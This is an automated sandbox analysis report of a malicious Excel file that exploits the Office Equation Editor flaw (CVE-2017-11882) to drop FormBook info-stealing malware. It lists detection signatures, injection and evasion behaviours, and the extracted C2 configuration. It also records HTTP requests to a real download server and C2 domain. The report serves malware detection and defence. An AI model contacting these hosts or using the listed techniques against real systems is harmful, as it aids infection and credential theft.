Windows Analysis Report CMACGM-XIN SHANGHAI -08M91W1MA-TRISK-QAHMD.xlsx

Overview

General Information

Sample Name:	CMACGM-XIN SHANGHAI -08M91W1MA-TRISK-QAHMD.xlsx
Analysis ID:	435308
MD5:	2e75248bf9decdb8d02c9e69ac261a61
SHA1:	45f584d63706026e963cbb5b7242a4bc130efee7
SHA256:	5e9b6256c2adafe03e928b0afe98328a3d77c69c6f924d2608e9daf131063d9f
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000005.00000002.2207008330.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2207008330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2206934673.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2371233155.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2206743064.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2371354059.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2371384803.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2169703300.0000000003489000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.vbc.exe.400000.1.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.2207091115.0000000000811000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	4_2_0045A7C0
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	5_2_0040E442
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	7_2_0008E442

Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236

Source: global traffic	HTTP traffic detected: GET /frsdoc/svchost.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nff/?7nbpTbD=E6fLQbQkmX4/6uamieHtmkhlLAH8o5Ikh6AParAHUnAgUAgt+y3sQZ1X1kCbUlkP6l5bSg==&MHHh-b=chfdPRJhKHQ0Rpo0 HTTP/1.1Host: www.glendalesocialmediaagency.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2189785871.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2189785871.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2189785871.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2189785871.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2189785871.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2177618159.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: 00000005.00000002.2207008330.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2207008330.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2206934673.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2206934673.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2371233155.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2371233155.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2206743064.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2206743064.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2371354059.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2371354059.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2371384803.00000000001B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2371384803.00000000001B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2169703300.0000000003489000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2169703300.0000000003489000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419D50 NtCreateFile,	5_2_00419D50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E00 NtReadFile,	5_2_00419E00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E80 NtClose,	5_2_00419E80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419F30 NtAllocateVirtualMemory,	5_2_00419F30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419DA9 NtReadFile,	5_2_00419DA9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419E7A NtClose,	5_2_00419E7A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00419F2D NtAllocateVirtualMemory,	5_2_00419F2D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F00C4 NtCreateFile,LdrInitializeThunk,	5_2_008F00C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F0048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_008F0048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F0078 NtResumeThread,LdrInitializeThunk,	5_2_008F0078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EF9F0 NtClose,LdrInitializeThunk,	5_2_008EF9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EF900 NtReadFile,LdrInitializeThunk,	5_2_008EF900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_008EFAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_008EFAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_008EFBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_008EFB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_008EFC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_008EFC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFD8C NtDelayExecution,LdrInitializeThunk,	5_2_008EFD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_008EFDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_008EFEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_008EFED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFFB4 NtCreateSection,LdrInitializeThunk,	5_2_008EFFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F10D0 NtOpenProcessToken,	5_2_008F10D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F0060 NtQuerySection,	5_2_008F0060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F01D4 NtSetValueKey,	5_2_008F01D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F010C NtOpenDirectoryObject,	5_2_008F010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F1148 NtOpenThread,	5_2_008F1148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F07AC NtCreateMutant,	5_2_008F07AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EF8CC NtWaitForSingleObject,	5_2_008EF8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EF938 NtWriteFile,	5_2_008EF938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F1930 NtSetContextThread,	5_2_008F1930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFAB8 NtQueryValueKey,	5_2_008EFAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFA20 NtQueryInformationFile,	5_2_008EFA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFA50 NtEnumerateValueKey,	5_2_008EFA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFBE8 NtQueryVirtualMemory,	5_2_008EFBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFB50 NtCreateKey,	5_2_008EFB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFC30 NtOpenProcess,	5_2_008EFC30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFC48 NtSetInformationFile,	5_2_008EFC48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F0C40 NtGetContextThread,	5_2_008F0C40
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F1D80 NtSuspendThread,	5_2_008F1D80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFD5C NtEnumerateKey,	5_2_008EFD5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFE24 NtWriteVirtualMemory,	5_2_008EFE24
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFFFC NtCreateProcessEx,	5_2_008EFFFC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008EFF34 NtQueueApcThread,	5_2_008EFF34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D100C4 NtCreateFile,LdrInitializeThunk,	7_2_00D100C4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D107AC NtCreateMutant,LdrInitializeThunk,	7_2_00D107AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0F9F0 NtClose,LdrInitializeThunk,	7_2_00D0F9F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0F900 NtReadFile,LdrInitializeThunk,	7_2_00D0F900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_00D0FAE8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_00D0FBB8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FB50 NtCreateKey,LdrInitializeThunk,	7_2_00D0FB50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_00D0FB68
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_00D0FC60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_00D0FDC0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FD8C NtDelayExecution,LdrInitializeThunk,	7_2_00D0FD8C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_00D0FED0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FFB4 NtCreateSection,LdrInitializeThunk,	7_2_00D0FFB4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D110D0 NtOpenProcessToken,	7_2_00D110D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D10048 NtProtectVirtualMemory,	7_2_00D10048
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D10078 NtResumeThread,	7_2_00D10078
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D10060 NtQuerySection,	7_2_00D10060
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D101D4 NtSetValueKey,	7_2_00D101D4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D11148 NtOpenThread,	7_2_00D11148
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D1010C NtOpenDirectoryObject,	7_2_00D1010C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0F8CC NtWaitForSingleObject,	7_2_00D0F8CC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D11930 NtSetContextThread,	7_2_00D11930
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0F938 NtWriteFile,	7_2_00D0F938
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FAD0 NtAllocateVirtualMemory,	7_2_00D0FAD0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FAB8 NtQueryValueKey,	7_2_00D0FAB8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FA50 NtEnumerateValueKey,	7_2_00D0FA50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FA20 NtQueryInformationFile,	7_2_00D0FA20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FBE8 NtQueryVirtualMemory,	7_2_00D0FBE8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FC90 NtUnmapViewOfSection,	7_2_00D0FC90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D10C40 NtGetContextThread,	7_2_00D10C40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FC48 NtSetInformationFile,	7_2_00D0FC48
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FC30 NtOpenProcess,	7_2_00D0FC30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D11D80 NtSuspendThread,	7_2_00D11D80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FD5C NtEnumerateKey,	7_2_00D0FD5C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FEA0 NtReadVirtualMemory,	7_2_00D0FEA0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FE24 NtWriteVirtualMemory,	7_2_00D0FE24
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FFFC NtCreateProcessEx,	7_2_00D0FFFC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D0FF34 NtQueueApcThread,	7_2_00D0FF34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00099D50 NtCreateFile,	7_2_00099D50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00099E00 NtReadFile,	7_2_00099E00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00099E80 NtClose,	7_2_00099E80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00099DA9 NtReadFile,	7_2_00099DA9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00099E7A NtClose,	7_2_00099E7A

Source: C:\Users\Public\vbc.exe	Code function: 4_2_001EC0E8	4_2_001EC0E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001ED2E1	4_2_001ED2E1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001EC3B0	4_2_001EC3B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E9610	4_2_001E9610
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001EC966	4_2_001EC966
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001EC039	4_2_001EC039
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001EF0A0	4_2_001EF0A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E32B0	4_2_001E32B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E32A1	4_2_001E32A1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E5490	4_2_001E5490
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001EB4E0	4_2_001EB4E0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E5A8A	4_2_001E5A8A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004559B9	4_2_004559B9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00450A80	4_2_00450A80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00450878	4_2_00450878
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00450888	4_2_00450888
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0045509D	4_2_0045509D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004561C0	4_2_004561C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004515D0	4_2_004515D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00454A71	4_2_00454A71
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00450600	4_2_00450600
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00450610	4_2_00450610
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00455EA1	4_2_00455EA1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004503D8	4_2_004503D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00450BE7	4_2_00450BE7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D069	5_2_0041D069
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041DA97	5_2_0041DA97
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D5C9	5_2_0041D5C9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D8D	5_2_00402D8D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00409E2B	5_2_00409E2B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00409E30	5_2_00409E30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041DF79	5_2_0041DF79
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FE0C6	5_2_008FE0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092D005	5_2_0092D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091905A	5_2_0091905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00903040	5_2_00903040
